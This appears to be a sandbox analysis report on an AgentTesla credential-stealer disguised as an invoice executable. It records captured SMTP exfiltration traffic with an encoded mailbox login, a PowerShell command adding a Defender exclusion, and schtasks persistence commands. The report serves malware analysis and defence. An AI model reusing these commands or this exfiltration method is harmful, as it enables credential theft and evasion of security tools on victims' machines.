                                          220 and/or bulk e-mail.
                                          May 26, 2023 11:30:19.493402958 CEST49697587192.168.2.35.100.152.24EHLO 675052
                                          May 26, 2023 11:30:19.522346020 CEST587496975.100.152.24192.168.2.3250-cp-uk-1.webhostbox.net Hello 675052 [84.17.52.45]
                                          250-SIZE 52428800
                                          250-8BITMIME
                                          250-PIPELINING
                                          250-PIPE_CONNECT
                                          250-AUTH PLAIN LOGIN
                                          250-STARTTLS
                                          250 HELP
                                          May 26, 2023 11:30:19.524163961 CEST49697587192.168.2.35.100.152.24AUTH login cWNsYWJAZ2ltcGV4LWltZXJ5cy5jb20=
                                          May 26, 2023 11:30:19.553760052 CEST587496975.100.152.24192.168.2.3334 UGFzc3dvcmQ6
                                          May 26, 2023 11:30:19.733593941 CEST587496975.100.152.24192.168.2.3235 Authentication succeeded
                                          May 26, 2023 11:30:19.734699011 CEST49697587192.168.2.35.100.152.24MAIL FROM:<qclab@gimpex-imerys.com>
                                          May 26, 2023 11:30:19.764169931 CEST587496975.100.152.24192.168.2.3250 OK
                                          May 26, 2023 11:30:19.764425993 CEST49697587192.168.2.35.100.152.24RCPT TO:<obtxxxtf@gmail.com>
                                          May 26, 2023 11:30:19.844118118 CEST587496975.100.152.24192.168.2.3250 Accepted
                                          May 26, 2023 11:30:19.844368935 CEST49697587192.168.2.35.100.152.24DATA
                                          May 26, 2023 11:30:19.874423027 CEST587496975.100.152.24192.168.2.3354 Enter message, ending with "." on a line by itself
                                          May 26, 2023 11:30:19.876096964 CEST49697587192.168.2.35.100.152.24.
                                          May 26, 2023 11:30:19.910511017 CEST587496975.100.152.24192.168.2.3250 OK id=1q2Tm7-003Omm-RL
                                          May 26, 2023 11:30:37.843923092 CEST587496985.100.152.24192.168.2.3220-cp-uk-1.webhostbox.net ESMTP Exim 4.95 #2 Fri, 26 May 2023 09:30:37 +0000
                                          220-We do not authorize the use of this system to transport unsolicited,
                                          220 and/or bulk e-mail.
                                          May 26, 2023 11:30:37.844399929 CEST49698587192.168.2.35.100.152.24EHLO 675052
                                          May 26, 2023 11:30:37.873491049 CEST587496985.100.152.24192.168.2.3250-cp-uk-1.webhostbox.net Hello 675052 [84.17.52.45]
                                          250-SIZE 52428800
                                          250-8BITMIME
                                          250-PIPELINING
                                          250-PIPE_CONNECT
                                          250-AUTH PLAIN LOGIN
                                          250-STARTTLS
                                          250 HELP
                                          May 26, 2023 11:30:37.875005007 CEST49698587192.168.2.35.100.152.24AUTH login cWNsYWJAZ2ltcGV4LWltZXJ5cy5jb20=
                                          May 26, 2023 11:30:37.904480934 CEST587496985.100.152.24192.168.2.3334 UGFzc3dvcmQ6
                                          May 26, 2023 11:30:37.935765028 CEST587496985.100.152.24192.168.2.3235 Authentication succeeded
                                          May 26, 2023 11:30:37.936095953 CEST49698587192.168.2.35.100.152.24MAIL FROM:<qclab@gimpex-imerys.com>
                                          May 26, 2023 11:30:37.964807034 CEST587496985.100.152.24192.168.2.3250 OK
                                          May 26, 2023 11:30:37.968437910 CEST49698587192.168.2.35.100.152.24RCPT TO:<obtxxxtf@gmail.com>
                                          May 26, 2023 11:30:38.054229975 CEST587496985.100.152.24192.168.2.3250 Accepted
                                          May 26, 2023 11:30:38.055352926 CEST49698587192.168.2.35.100.152.24DATA
                                          May 26, 2023 11:30:38.084300041 CEST587496985.100.152.24192.168.2.3354 Enter message, ending with "." on a line by itself
                                          May 26, 2023 11:30:38.087728024 CEST49698587192.168.2.35.100.152.24.
                                          May 26, 2023 11:30:38.121530056 CEST587496985.100.152.24192.168.2.3250 OK id=1q2TmQ-003OrY-1t
                                          May 26, 2023 11:31:59.308639050 CEST49697587192.168.2.35.100.152.24QUIT
                                          May 26, 2023 11:31:59.540105104 CEST587496975.100.152.24192.168.2.3221 cp-uk-1.webhostbox.net closing connection

                                          Click to jump to process

                                          Target ID:0
                                          Start time:11:29:56
                                          Start date:26/05/2023
                                          Path:C:\Users\user\Desktop\INVOICE_NO._29998172.exe
                                          Wow64 process (32bit):true
                                          Commandline:C:\Users\user\Desktop\INVOICE_NO._29998172.exe
                                          Imagebase:0xa70000
                                          File size:694272 bytes
                                          MD5 hash:024997939B7CE9B28382176C0A70CEC8
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:.Net C# or VB.NET
                                          Yara matches:
                                          • Rule: JoeSecurity_AgentTesla_2, Description: Yara detected AgentTesla, Source: 00000000.00000002.399658088.000000000407C000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                          • Rule: JoeSecurity_AgentTesla_2, Description: Yara detected AgentTesla, Source: 00000000.00000002.399658088.0000000004975000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                          Reputation:low

                                          Target ID:1
                                          Start time:11:30:06
                                          Start date:26/05/2023
                                          Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                          Wow64 process (32bit):true
                                          Commandline:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\txQleCu.exe
                                          Imagebase:0x110000
                                          File size:430592 bytes
                                          MD5 hash:DBA3E6449E97D4E3DF64527EF7012A10
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:.Net C# or VB.NET
                                          Reputation:high

                                          Target ID:2
                                          Start time:11:30:07
                                          Start date:26/05/2023
                                          Path:C:\Windows\System32\conhost.exe
                                          Wow64 process (32bit):false
                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                          Imagebase:0x7ff745070000
                                          File size:625664 bytes
                                          MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Reputation:high

                                          Target ID:3
                                          Start time:11:30:07
                                          Start date:26/05/2023
                                          Path:C:\Windows\SysWOW64\schtasks.exe
                                          Wow64 process (32bit):true
                                          Commandline:C:\Windows\System32\schtasks.exe" /Create /TN "Updates\txQleCu" /XML "C:\Users\user\AppData\Local\Temp\tmpEB82.tmp
                                          Imagebase:0x1340000
                                          File size:185856 bytes
                                          MD5 hash:15FF7D8324231381BAD48A052F85DF04
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Reputation:high

                                          Target ID:4
                                          Start time:11:30:07
                                          Start date:26/05/2023
                                          Path:C:\Windows\System32\conhost.exe
                                          Wow64 process (32bit):false
                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                          Imagebase:0x7ff745070000
                                          File size:625664 bytes
                                          MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Reputation:high

                                          Target ID:5
                                          Start time:11:30:08
                                          Start date:26/05/2023
                                          Path:C:\Users\user\AppData\Roaming\txQleCu.exe
                                          Wow64 process (32bit):true
                                          Commandline:C:\Users\user\AppData\Roaming\txQleCu.exe
                                          Imagebase:0xf00000
                                          File size:694272 bytes
                                          MD5 hash:024997939B7CE9B28382176C0A70CEC8
                                          Has elevated privileges:false
                                          Has administrator privileges:false
                                          Programmed in:.Net C# or VB.NET
                                          Yara matches:
                                          • Rule: JoeSecurity_AgentTesla_2, Description: Yara detected AgentTesla, Source: 00000005.00000002.440863847.000000000450B000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                          Antivirus matches:
                                          • Detection: 100%, Joe Sandbox ML
                                          • Detection: 25%, ReversingLabs
                                          Reputation:low

                                          Target ID:6
                                          Start time:11:30:09
                                          Start date:26/05/2023
                                          Path:C:\Users\user\Desktop\INVOICE_NO._29998172.exe
                                          Wow64 process (32bit):true
                                          Commandline:C:\Users\user\Desktop\INVOICE_NO._29998172.exe
                                          Imagebase:0xa80000
                                          File size:694272 bytes
                                          MD5 hash:024997939B7CE9B28382176C0A70CEC8
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:.Net C# or VB.NET
                                          Yara matches:
                                          • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000006.00000002.629144860.0000000002E91000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                          • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000006.00000002.629144860.0000000002E91000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                          Reputation:low

                                          Target ID:10
                                          Start time:11:30:25
                                          Start date:26/05/2023
                                          Path:C:\Windows\SysWOW64\schtasks.exe
                                          Wow64 process (32bit):true
                                          Commandline:C:\Windows\System32\schtasks.exe" /Create /TN "Updates\txQleCu" /XML "C:\Users\user\AppData\Local\Temp\tmp3339.tmp
                                          Imagebase:0x1340000
                                          File size:185856 bytes
                                          MD5 hash:15FF7D8324231381BAD48A052F85DF04
                                          Has elevated privileges:false
                                          Has administrator privileges:false
                                          Programmed in:C, C++ or other language
                                          Reputation:high

                                          Target ID:11
                                          Start time:11:30:25
                                          Start date:26/05/2023
                                          Path:C:\Windows\System32\conhost.exe
                                          Wow64 process (32bit):false
                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                          Imagebase:0x7ff745070000
                                          File size:625664 bytes
                                          MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                          Has elevated privileges:false
                                          Has administrator privileges:false
                                          Programmed in:C, C++ or other language
                                          Reputation:high

                                          Target ID:12
                                          Start time:11:30:27
                                          Start date:26/05/2023
                                          Path:C:\Users\user\AppData\Roaming\txQleCu.exe
                                          Wow64 process (32bit):true
                                          Commandline:C:\Users\user\AppData\Roaming\txQleCu.exe
                                          Imagebase:0x790000
                                          File size:694272 bytes
                                          MD5 hash:024997939B7CE9B28382176C0A70CEC8
                                          Has elevated privileges:false
                                          Has administrator privileges:false
                                          Programmed in:.Net C# or VB.NET
                                          Yara matches:
                                          • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 0000000C.00000002.629486178.0000000002BE1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                          • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000C.00000002.629486178.0000000002BE1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security

                                          No disassembly